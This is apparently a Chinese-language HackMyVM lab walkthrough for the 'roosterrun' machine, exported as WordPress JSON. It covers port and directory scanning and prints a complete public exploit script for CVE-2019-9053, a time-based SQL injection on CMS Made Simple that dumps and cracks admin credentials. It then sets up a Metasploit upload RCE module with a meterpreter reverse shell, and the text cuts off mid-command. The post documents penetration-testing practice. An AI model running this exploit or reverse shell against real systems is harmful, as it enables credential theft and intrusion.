{"id":507,"date":"2024-04-05T18:41:04","date_gmt":"2024-04-05T10:41:04","guid":{"rendered":"http:\/\/162.14.82.114\/?p=507"},"modified":"2024-04-05T18:41:04","modified_gmt":"2024-04-05T10:41:04","slug":"hmv-_-roosterrun","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/507\/04\/05\/2024\/","title":{"rendered":"hmv[-_-]roosterrun"},"content":{"rendered":"<h1>roosterrun<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840349.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840349.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405124215450\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.3 -- -A<\/code><\/pre>\n<pre><code class=\"language-css\">PORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp open  http    syn-ack Apache httpd 2.4.57 ((Debian))\n|_http-title: Home - Blog\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-favicon: Unknown favicon MD5: 551E34ACF2930BF083670FA203420993\n|_http-generator: CMS Made Simple - Copyright (C) 2004-2023. All rights reserved.\n|_http-server-header: Apache\/2.4.57 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code>gobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n<pre><code class=\"language-css\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.3\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/modules              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.3\/modules\/]\n\/uploads              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.3\/uploads\/]\n\/doc                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.3\/doc\/]\n\/admin                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.3\/admin\/]\n\/assets               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.3\/assets\/]\n\/lib                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.3\/lib\/]\n\/tmp                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.3\/tmp\/]\n\/server-status        (Status: 403) [Size: 276]\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/172.20.10.3 -s 200,300-399 -d 3<\/code><\/pre>\n<pre><code class=\"language-css\">200      GET        1l       20w     3039c http:\/\/172.20.10.3\/uploads\/simplex\/js\/functions.min.js\n200      GET       13l       92w     6618c http:\/\/172.20.10.3\/uploads\/simplex\/images\/icons\/cmsms-60x60.png\n200      GET       22l      119w     8605c http:\/\/172.20.10.3\/uploads\/simplex\/images\/icons\/cmsms-76x76.png\n200      GET        2l       32w      310c http:\/\/172.20.10.3\/tmp\/cache\/stylesheet_combined_0d2fdbf99188c55873e2137f35485fe3.css\n200      GET        7l       46w     3241c http:\/\/172.20.10.3\/uploads\/simplex\/images\/cmsmadesimple-logo.png\n200      GET      146l     1000w    77673c http:\/\/172.20.10.3\/uploads\/simplex\/teaser\/mate-zimple.png\n200      GET       49l      292w    21539c http:\/\/172.20.10.3\/uploads\/simplex\/images\/icons\/cmsms-196x196.png\n200      GET       38l      234w    15357c http:\/\/172.20.10.3\/uploads\/simplex\/images\/icons\/cmsms-120x120.png\n200      GET       46l      244w    16140c http:\/\/172.20.10.3\/uploads\/simplex\/teaser\/palm-logo.png\n200      GET       42l      274w    17352c http:\/\/172.20.10.3\/uploads\/simplex\/images\/icons\/cmsms-152x152.png\n200      GET        3l        6w     2634c http:\/\/172.20.10.3\/uploads\/simplex\/images\/icons\/favicon_cms.ico\n200      GET        6l     2820w    32881c http:\/\/172.20.10.3\/tmp\/cache\/stylesheet_combined_f403e174ee7208ce2ba6ebba2191ed2e.css\n200      GET      279l     2020w   159674c http:\/\/172.20.10.3\/uploads\/simplex\/teaser\/browser-scene.png\n200      GET        4l     1412w    95786c http:\/\/172.20.10.3\/lib\/jquery\/js\/jquery-1.11.1.min.js\n200      GET       26l      374w    26556c http:\/\/172.20.10.3\/uploads\/simplex\/js\/jquery.sequence-min.js\n200      GET      310l     1844w   141324c http:\/\/172.20.10.3\/uploads\/simplex\/teaser\/mobile-devices-scene.png\n200      GET      127l     1179w    19257c http:\/\/172.20.10.3\/index.php\n200      GET      127l     1179w    19257c http:\/\/172.20.10.3\/\n200      GET        1l        0w        2c http:\/\/172.20.10.3\/uploads\/simplex\/\n200      GET        0l        0w        0c http:\/\/172.20.10.3\/tmp\/cache\/\n200      GET        1l        1w        7c http:\/\/172.20.10.3\/lib\/phpmailer\/VERSION\n200      GET      504l     4372w    26421c http:\/\/172.20.10.3\/lib\/phpmailer\/LICENSE<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">whatweb http:\/\/172.20.10.3                             \nhttp:\/\/172.20.10.3 [200 OK] Apache[2.4.57], CMS-Made-Simple[2.2.9.1], Cookies[CMSSESSIDa0ef49a94e6c], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.57 (Debian)], IP[172.20.10.3], JQuery[1.11.1], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2023. All rights reserved.], Script[text\/javascript], Title[Home - Blog]\n\n ___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  CMS Scan Results  [+] \n\n \u250f\u2501Target: 172.20.10.3\n \u2503\n \u2520\u2500\u2500 CMS: CMS Made Simple\n \u2503    \u2502\n \u2503    \u2570\u2500\u2500 URL: https:\/\/cmsmadesimple.org\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/Result\/172.20.10.3\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 19.24 Seconds, using 1 Requests<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840350.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840350.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405124859718\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840351.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840351.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405124950988\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u968f\u624b\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u6709\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840352.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840352.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405125055122\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u63a5\u7740\u770b\u5176\u4ed6\u4fe1\u606f\uff1a<\/p>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">\/uploads  \/doc<\/code><\/pre>\n<p>\u5b58\u5728\uff0c\u4f46\u662f\u770b\u4e0d\u4e86\u3002<\/p>\n<pre><code class=\"language-apl\">\/admin<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840353.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840353.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405130036275\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>SQL\u6ce8\u5165<\/h3>\n<p>\u627e\u5230\u767b\u5f55\u7a97\u53e3\uff0c\u5c1d\u8bd5\u5f31\u5bc6\u7801\u4ee5\u53ca\u4e07\u80fd\u5bc6\u7801\uff0c\u65e0\u679c\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u521a\u521a\u770b\u5230\u7684\u90a3\u4e2asql\u6ce8\u5165\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/env python\n# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple &lt;= 2.2.9\n# Date: 30-03-2019\n# Exploit Author: Daniele Scanu @ Certimeter Group\n# Vendor Homepage: https:\/\/www.cmsmadesimple.org\/\n# Software Link: https:\/\/www.cmsmadesimple.org\/downloads\/cmsms\/\n# Version: &lt;= 2.2.9\n# Tested on: Ubuntu 18.04 LTS\n# CVE : CVE-2019-9053\n\nimport requests\nfrom termcolor import colored\nimport time\nfrom termcolor import cprint\nimport optparse\nimport hashlib\n\nparser = optparse.OptionParser()\nparser.add_option(&#039;-u&#039;, &#039;--url&#039;, action=&quot;store&quot;, dest=&quot;url&quot;, help=&quot;Base target uri (ex. http:\/\/10.10.10.100\/cms)&quot;)\nparser.add_option(&#039;-w&#039;, &#039;--wordlist&#039;, action=&quot;store&quot;, dest=&quot;wordlist&quot;, help=&quot;Wordlist for crack admin password&quot;)\nparser.add_option(&#039;-c&#039;, &#039;--crack&#039;, action=&quot;store_true&quot;, dest=&quot;cracking&quot;, help=&quot;Crack password with wordlist&quot;, default=False)\n\noptions, args = parser.parse_args()\nif not options.url:\n    print &quot;[+] Specify an url target&quot;\n    print &quot;[+] Example usage (no cracking password): exploit.py -u http:\/\/target-uri&quot;\n    print &quot;[+] Example usage (with cracking password): exploit.py -u http:\/\/target-uri --crack -w \/path-wordlist&quot;\n    print &quot;[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.&quot;\n    exit()\n\nurl_vuln = options.url + &#039;\/moduleinterface.php?mact=News,m1_,default,0&#039;\nsession = requests.Session()\ndictionary = &#039;1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$&#039;\nflag = True\npassword = &quot;&quot;\ntemp_password = &quot;&quot;\nTIME = 1\ndb_name = &quot;&quot;\noutput = &quot;&quot;\nemail = &quot;&quot;\n\nsalt = &#039;&#039;\nwordlist = &quot;&quot;\nif options.wordlist:\n    wordlist += options.wordlist\n\ndef crack_password():\n    global password\n    global output\n    global wordlist\n    global salt\n    dict = open(wordlist)\n    for line in dict.readlines():\n        line = line.replace(&quot;\\n&quot;, &quot;&quot;)\n        beautify_print_try(line)\n        if hashlib.md5(str(salt) + line).hexdigest() == password:\n            output += &quot;\\n[+] Password cracked: &quot; + line\n            break\n    dict.close()\n\ndef beautify_print_try(value):\n    global output\n    print &quot;\\033c&quot;\n    cprint(output,&#039;green&#039;, attrs=[&#039;bold&#039;])\n    cprint(&#039;[*] Try: &#039; + value, &#039;red&#039;, attrs=[&#039;bold&#039;])\n\ndef beautify_print():\n    global output\n    print &quot;\\033c&quot;\n    cprint(output,&#039;green&#039;, attrs=[&#039;bold&#039;])\n\ndef dump_salt():\n    global flag\n    global salt\n    global output\n    ord_salt = &quot;&quot;\n    ord_salt_temp = &quot;&quot;\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_salt = salt + dictionary[i]\n            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_salt)\n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_siteprefs+where+sitepref_value+like+0x&quot; + ord_salt_temp + &quot;25+and+sitepref_name+like+0x736974656d61736b)+--+&quot;\n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time &gt;= TIME:\n                flag = True\n                break\n        if flag:\n            salt = temp_salt\n            ord_salt = ord_salt_temp\n    flag = True\n    output += &#039;\\n[+] Salt for password found: &#039; + salt\n\ndef dump_password():\n    global flag\n    global password\n    global output\n    ord_password = &quot;&quot;\n    ord_password_temp = &quot;&quot;\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_password = password + dictionary[i]\n            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_password)\n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_users&quot;\n            payload += &quot;+where+password+like+0x&quot; + ord_password_temp + &quot;25+and+user_id+like+0x31)+--+&quot;\n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time &gt;= TIME:\n                flag = True\n                break\n        if flag:\n            password = temp_password\n            ord_password = ord_password_temp\n    flag = True\n    output += &#039;\\n[+] Password found: &#039; + password\n\ndef dump_username():\n    global flag\n    global db_name\n    global output\n    ord_db_name = &quot;&quot;\n    ord_db_name_temp = &quot;&quot;\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_db_name = db_name + dictionary[i]\n            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_db_name)\n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_users+where+username+like+0x&quot; + ord_db_name_temp + &quot;25+and+user_id+like+0x31)+--+&quot;\n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time &gt;= TIME:\n                flag = True\n                break\n        if flag:\n            db_name = temp_db_name\n            ord_db_name = ord_db_name_temp\n    output += &#039;\\n[+] Username found: &#039; + db_name\n    flag = True\n\ndef dump_email():\n    global flag\n    global email\n    global output\n    ord_email = &quot;&quot;\n    ord_email_temp = &quot;&quot;\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_email = email + dictionary[i]\n            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_email)\n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_users+where+email+like+0x&quot; + ord_email_temp + &quot;25+and+user_id+like+0x31)+--+&quot;            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time &gt;= TIME:\n                flag = True\n                break\n        if flag:\n            email = temp_email\n            ord_email = ord_email_temp\n    output += &#039;\\n[+] Email found: &#039; + email\n    flag = True\n\ndump_salt()\ndump_username()\ndump_email()\ndump_password()\n\nif options.cracking:\n    print colored(&quot;[*] Now try to crack password&quot;)\n    crack_password()\n\nbeautify_print()          <\/code><\/pre>\n<p>\u5229\u7528sleep\u51fd\u6570\u8fdb\u884c\u65f6\u95f4\u578b\u76f2\u6ce8\uff0c\u8fd0\u884c\u4e00\u4e0b\u8fd9\u4e2a\u811a\u672c\uff1a<\/p>\n<p>\u5148\u5b89\u88c5\u4e00\u4e0b\u5e93\uff0c\u8fd9\u662f\u4e2apython2\u7684\u811a\u672c<\/p>\n<pre><code class=\"language-bash\">curl https:\/\/bootstrap.pypa.io\/pip\/2.7\/get-pip.py -o get-pip.py  \npython2 get-pip.py\npython2 -m pip install --upgrade setuptools\npython2 -m pip install termcolor <\/code><\/pre>\n<pre><code class=\"language-bash\">python2 46635.py -u http:\/\/172.20.10.3\n[+] Salt for password found: 1a0112229fbd699d\n[+] Username found: admin\n[+] Email found: admin@localhost.com\n[+] Password found: 4f943036486b9ad48890b2efbf7735a8<\/code><\/pre>\n<p>\u767b\u5f55\u8fdb\u53bb\uff1a<\/p>\n<pre><code class=\"language-apl\">admin \n4f943036486b9ad48890b2efbf7735a8<\/code><\/pre>\n<p>\u4f46\u662f\u5931\u8d25\u4e86\u3002\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u52a0\u76d0hash\u78b0\u649e\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &#039;admin:4f943036486b9ad48890b2efbf7735a8$1a0112229fbd699d&#039; &gt; pass_hash\njohn -w=\/usr\/share\/wordlists\/rockyou.txt pass_hash <\/code><\/pre>\n<p>\u65f6\u95f4\u7a0d\u5fae\u6709\u70b9\u957f\uff0c\u5c1d\u8bd5\u4e86\u4e0a\u9762\u90a3\u4e2a\u811a\u672c\u63d0\u4f9b\u7684\u7206\u7834\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-bash\">python2 46635.py -u http:\/\/172.20.10.3 --crack -w \/usr\/share\/wordlists\/rockyou.txt\n[+] Salt for password found: 1a0112229fbd699d\n[+] Username found: admin\n[+] Email found: admin@localhost.com\n[+] Password found: 4f943036486b9ad48890b2efbf7735a8\n[+] Password cracked: homeandaway<\/code><\/pre>\n<p>\u5f97\u5230\u4e86\u5bc6\u7801\uff01\u4e0a\u9762\u90a3\u4e2ajohn\u6ca1\u6709\u7206\u7834\u51fa\u6765\u4e0d\u77e5\u9053\u548b\u56de\u4e8b\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>\u767b\u5f55\u8fdb\u53bb\u770b\u770b<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840354.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840354.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405140827987\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>metasploit RCE<\/h3>\n<p>\u5bfb\u627e\u4e00\u4e0b\u662f\u5426\u6709RCE\u6f0f\u6d1e<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840355.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840355.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405141305296\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840356.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840356.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405141322366\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u662f<code>metasploit<\/code>\u7684\uff0c\u53bb\u627e\u627e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840357.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840357.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405141549313\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\uff08\u9e2d\u5b50\u5c5e\u5b9e\u53ef\u7231\uff0c\u653e\u8fdb\u6765\uff09<\/p>\n<h4>cmsms_upload_rename_rce<\/h4>\n<p>\u6211\u4eec\u4e0a\u9762 google \u627e\u5230\u7684\u662f\u7b2c\u4e09\u4e2a\uff0c\u4f46\u662f\u7b2c\u4e8c\u4e2a\u6bd4\u8f83\u7a33\u5b9a\uff0c\u5c1d\u8bd5\u4f7f\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">msf6 &gt; search cms made simple\n\nMatching Modules\n================\n\n   #  Name                                           Disclosure Date  Rank       Check  Description\n   -  ----                                           ---------------  ----       -----  -----------\n   0  exploit\/multi\/http\/cmsms_showtime2_rce         2019-03-11       normal     Yes    CMS Made Simple (CMSMS) Showtime2 File Upload RCE\n   1  exploit\/multi\/http\/cmsms_upload_rename_rce     2018-07-03       excellent  Yes    CMS Made Simple Authenticated RCE via File Upload\/Copy\n   2  exploit\/multi\/http\/cmsms_object_injection_rce  2019-03-26       normal     Yes    CMS Made Simple Authenticated RCE via object injection\n\nInteract with a module by name or index. For example info 2, use 2 or use exploit\/multi\/http\/cmsms_object_injection_rce\n\nmsf6 &gt; use 1\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(multi\/http\/cmsms_upload_rename_rce) &gt; show options\n\nModule options (exploit\/multi\/http\/cmsms_upload_rename_rce):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   PASSWORD                    yes       Password to authenticate with\n   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      80               yes       The target port (TCP)\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI  \/cmsms\/          yes       Base cmsms directory path\n   USERNAME                    yes       Username to authenticate with\n   VHOST                       no        HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Universal\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/http\/cmsms_upload_rename_rce) &gt; set password homeandaway\npassword =&gt; homeandaway\nmsf6 exploit(multi\/http\/cmsms_upload_rename_rce) &gt; set username admin\nusername =&gt; admin\nmsf6 